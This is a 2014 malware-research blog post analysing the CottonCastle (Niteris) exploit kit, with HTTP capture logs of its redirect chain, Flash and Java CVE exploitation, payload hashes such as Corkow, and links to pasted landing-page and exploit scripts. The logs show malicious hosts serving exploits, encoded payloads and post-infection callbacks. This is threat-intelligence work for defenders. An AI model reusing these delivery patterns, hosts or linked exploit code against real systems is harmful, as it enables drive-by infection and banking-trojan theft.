2014-06-09 - Study

Meet Niteris EK (formerly known as CottonCastle)

Pamukkale  (source image: sina.com)

<Edit: 2014-07-13>
On the redirector to CottonCastle :

2014-07-13 - "CottonCastle - realname Niteris ;)"

Thanks for that.
So Plague in Latin it seems.

Thanks to an Independant researcher from Russia who shared some referer driving to an Exploit Kit on tcp 27005, I was able to meet again the "Unknow EK" that was first spotted by EKWatcher in September 2013.

Pattern for this EK were like :

Custom TDS then CottonCastle - 2013-09-16
from GB

GET http://alabamarog.socket-render.info:5125/h2x/3/a627d480c37cfaf6f3634150496340ed/http%3A%2F%2Fgoo.gl%2FoYb4sq
207 Multi-Status (text/html)

GET http://alabamarog.socket-render.info:5125/h2p/3/BG/f444ab1cfeb2945d149c03508367776f.dts
200 OK (application/octed-stream)

GET http://alabamarog.socket-render.info:5125/h2i/3/BG/c708c60762f6a35c5fce213eb840ce51
200 OK (application/octed-stream)

GET http://alabamarog.socket-render.info:5125/callme?r=111
200 OK (text/html)

OT: that infection chain was really interesting.
Out of Topic 1 : the redirecting js on the compromised website is quite interesting

js  ( http://pastebin.com/T4RLpFuN 2014-06-05)
in front of the first TDS seems to give a weight to the event and will fire only for IE and Firefox
Not sure how effective is this (i mean compared to basic onmouse move)
Reference to Justin Bourque
Reload: 2014-06-06 http://pastebin.com/XeHfVTKU
Reference now to "Michelle reporter"

Out of Topic 2 : the first TDS will drive you to Angler EK from US :

Angler EK after first TDS in US
Payload 270fd28f3b9ae3ad071468ec0c03c83d is Vawtrak

and from DE in some case:
Angler EK after first TDS in DE (in the night)
By day it was redirecting to CottonCastle
Fully working on the 2014-06-05 but 409 on the 2014-06-06
Payload  6f56f55c38be1cdad7ca498f4e93e219 fire some Glupteba rules by Emerging Threats
Suricata with ET rules alerts on traffic generated by 6f56f55c38be1cdad7ca498f4e93e219
In some case from Russia i got both CottonCastle's TDS and a Nuclear Pack

First TDS redirecting to both CottonCastle's TDS and Nuclear Pack
From Russia 2014-06-06
Payload was : b8d913208d4230b2ff7ddc01a1ddef07
Now back to CottonCastle.
Pattern did not change that much, it now looks like :
2 TDS then CottonCastle 2014-06-05 from DE Note the c.hit.ua counter both on the second TDS and in the landing. Note the reverse 2letter country code in many calls.

There are points that i have trouble to explain.
The day after the Counter have disappeared and the Exploit Kit seems not replying to hosts from RU/UA. Really strange when we see what those counter were like on the 5th :

Distribution of Countries hiting the Exploit Kit landing

Distribution of OS  hiting the exploit Kit landing

One month of stats on the counter that was associated to the landing
(note...EK is not associated to that counter right now)
Now let's see how this Exploit Kit is "weaponized".

CottonCastle : CVE-2013-0634

Successfull pass for CVE-2013-0634 in CottonCastle (from CA)
(post shellcode call missing here)

GET http://afasaq.jax-updates .pw:4433/forum/view/3/494f2e325d7efeaa894484780954a500/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)

Part of CottonCastle landing (full here : http://pastebin.com/k3nuNY5M)
tied to the flash  exploit
GET http://afasaq.jax-updates .pw:4433/forum/tracker/3/AC/be2a27de7a3778b96a858d59d4569ba4/348.338.161.453/
200 OK (application/x-shockwave-flash)
The day before it was : c224580e17d8bd4c251da29ea8bef647
This is where CottonCastle name come from
( idea of Will Metcalf from Emerging Threats)

GET http://afasaq.jax-updates .pw:4433/forum/advertisement/3/AC/464feda74d209abca9a05f244f4d7f3e
200 OK (text/html)  ( detailed in CVE-2013-2465 pass)

GET http://afasaq.jax-updates .pw:4433/forum/torrents/3/AC/37e8ccf9bf7a70d40d877bb592bd788a
200 OK (application/x-bittorrent) Decrypted payload : 953bf448637203cec92ea2d605a47d0c  Payload is Corkow (Thx Denis Laskov )

In that case i blocked the shellcode from  executing the payload.

Shellcode trying to execute payload.
But you should see that after infection
GET http://afasaq.jax-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)

Host IP:
47447 | | TTM | DE | 23MEDIA.EU | 23MEDIA GMBH

CottonCastle : CVE-2014-0515

It's the first time i see it in an Exploit Kit

CVE-2014-0515 firing in CottonCastle from DE
2014-06-05 - Flash

GET http://ajigin.iam-updates .pw:4433/forum/view/3/f2fdfed9c68b57f0ce6427defab7aa08/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)

GET http://ajigin.iam-updates .pw:4433/forum/tracker/3/ED/333f38dc127936ab62ca5ce517c1ccd0/346.343.343.481/
200 OK (application/x-shockwave-flash) 180e226457d9370ba590ca2a722e446f

GET http://ajigin.iam-updates .pw:4433/forum/advertisement/3/ED/4babaee37c31c47fe9dadc004f7a8732
200 OK (text/html) ( detailed in CVE-2013-2465 pass)

GET http://ajigin.iam-updates .pw:4433/forum/torrents/3/ED/277ff652f2cb92471a6abfd2a5f26341
200 OK (application/x-bittorrent) Decrypted payload 7773524265ed5409938950bfc7fca574 (same day i also got: 7794934b674a07d42b0e20a6acd49039 ) Again  Payload is Corkow (Thx Denis Laskov )

GET http://ajigin.iam-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)

CottonCastle : CVE-2013-2465

CottonCastle firing code exploiting CVE-2013-2465 to java6u45
GET http://abuzuc.jax-updates .pw:4433/forum/view/3/f379a32d59f0fe08d75cecbb9b12b558/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)

Part of the landing tied to that exploit
(full here : http://pastebin.com/Spv9TYvd )
Note : "OrbitWhite" is the rc4 for the rc funtion in the jar file.
Session after Hex2bin and rc4 decryption : http://abuzuc.jax-updates.pw:4433/forum/advertisement/3/AC/b87f6bc7ee855098e825312e151cc54c

GET http://abuzuc.jax-updates .pw:4433/forum/profile/3/AC/874a6ece58907e1f46934ea503aede0d.djvu
200 OK (text/html)  

jnlp 2014-06-06 http://pastebin.com/FNQgEbrt

GET http://abuzuc.jax-updates .pw:4433/forum/topic/3/AC/c94043e9a1ef9b59b382d5803fa3dadd.mkv
200 OK (application/octed-stream)  Exploit for CVE-2013-2465

The java dropped to jre6u45 is nice :)
p.dat (nested jar) :  f763401bcb93f9bd3ea3f1e6b1e58611
java.dll : d.dat : 279f500d9d3aff957ff9e67ffd5165ed
j.js : http://pastebin.com/0GXycyMS

GET http://abuzuc.jax-updates .pw:4433/forum/advertisement/3/AC/b87f6bc7ee855098e825312e151cc54c
200 OK (text/html) http://pastebin.com/JrTXX5eF

Contains a vbs script
(note the security product process names)

GET http://abuzuc.jax-updates .pw:4433/forum/torrents/3/AC/7dc49f51e16116534357d5918c33a29a
200 OK (application/x-bittorrent) Decoded payload f2788007f8b27dedac15aca71d0bf8f2  Corkow

Once again i blocked the payload execution but if infected you should get :

Call back to EK once payload is executed

GET abuzuc.jax-updates  .pw:4433/forum/posting/111/
409 Conflict (text/html) 

CottonCastle : CVE-2013-0422

I won't go in as much detailed as i did for CVE-2013-2465 but it's the same approach

GET http://bzycok.key-updates .pw:4433/forum/view/3/8216ed0f457b3ac54ca52cd13383fe25/http%3A%2F%2Fleveloped.in%2Fgovernment%2F70d83bde3d5f7e09%2F
203 Non-Authoritative Information (text/html)

GET http://bzycok.key-updates .pw:4433/forum/profile/3/LN/0d240529777cb6a302fdbbc437633a3d.djvu
200 OK (text/html)

GET http://bzycok.key-updates .pw:4433/forum/topic/3/LN/5453f6a894b378e19e5af7cce177803c.mkv
200 OK (application/octed-stream) 

Piece of CVE-2013-0422 in CottonCastle 2014-06-06

GET http://bzycok.key-updates .pw:4433/forum/advertisement/3/LN/54642665c1bd63f868f64db861c8a953
200 OK (text/html)   Encoded VBS

GET http://bzycok.key-updates .pw:4433/forum/topic/3/LN/5453f6a894b378e19e5af7cce177803c.mkv
409 Conflict (text/html)

GET http://bzycok.key-updates .pw:4433/forum/torrents/3/LN/1053ddb4e24bf9361a07d6bd5ed345ba
200 OK (application/x-bittorrent)  < Decoded Payload : 22e98a119b8e0f1c0616fd7e377d0ec6 same familly as previous.

GET http://bzycok.key-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)

CottonCastle : CVE-2013-2460

Once again I won't go in as much detailed as i did for CVE-2013-2465 but same approach
CVE-2013-2460 in CottonCastle : 2

GET http://bkysur.key-updates .pw:4433/forum/view/3/22bd553e598f5b43b7cfee1ee2630080/http%3A%2F%2Fleveloped.in%2Fgovernment%2F70d83bde3d5f7e09%2F
203 Non-Authoritative Information (text/html)

GET http://bkysur.key-updates .pw:4433/forum/profile/3/AC/bbce0e49bfc08250668441d0b80b7a63.djvu
200 OK (text/html)

GET http://bkysur.key-updates .pw:4433/forum/topic/3/AC/f2fe8bbc9c621e65a054598f8109a9a3.mkv
200 OK (application/octed-stream)  be66263cd1524b72423c0b5ec8094113

CVE-2013-2460 in CottonCastle 2014-06-06
GET http://bkysur.key-updates .pw:4433/forum/topic/3/AC/f2fe8bbc9c621e65a054598f8109a9a3.mkv
409 Conflict (text/html)

GET http://bkysur.key-updates .pw:4433/forum/advertisement/3/AC/540ff821785fd90aeed5e30ee351a6c9
200 OK (text/html) Encoded VBS

GET http://bkysur.key-updates .pw:4433/forum/torrents/3/AC/bc5215485d8c485b2b277a5f569a6bad
200 OK (application/x-bittorrent)

GET http://bkysur.key-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)

CottonCastle : CVE-2013-2551:

This CVE has been captured by Set_Abominae and covered by Malwageddon and identified by regenpijp1
I may update this post later once i face it.


CVE-2011-3544 ?? -- Didn't have the opportunity to check the EK with Java6 < 27 or at least < 18.
AV Process name Callback test. CVE-2013-2551 path.

Exploitation Graph :

This Exploit Kit is not widely used (maybe only by the operators Corkow botnet - and 2nd TDS).

Files: Here


Niteris Exploit Kit Screenshot : Source Group-IB
(page 10 of this report (PDF)  on buhtrap )


Credits : Thanks Timo Hirvonen for confirming the 2 flash  CVE, to Arseny Levin for defining the CVE-2013-2460. Thanks to EKWatcher for the rc4 decryption routine. Thanks Will Metcalf for many inputs. And warm thanks to the "independant researcher from russia" for the Referer.Thanks Denis Laskov for identifying the payload.

Read more :
CottonCastle EK: "I hate to break this to you, but this isn't gonna be an open casket." - 2014-04-08 - Malwageddon
Corkow: Analysis of a business-oriented banking Trojan - 2014-02-27 - Robert Lipovstky - Eset

Post - publication Reading :
APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks - 2016-02-08 - TheSecureList
Another look at Niteris : post exploitation WMI and Fiddler checks - 2015-05-12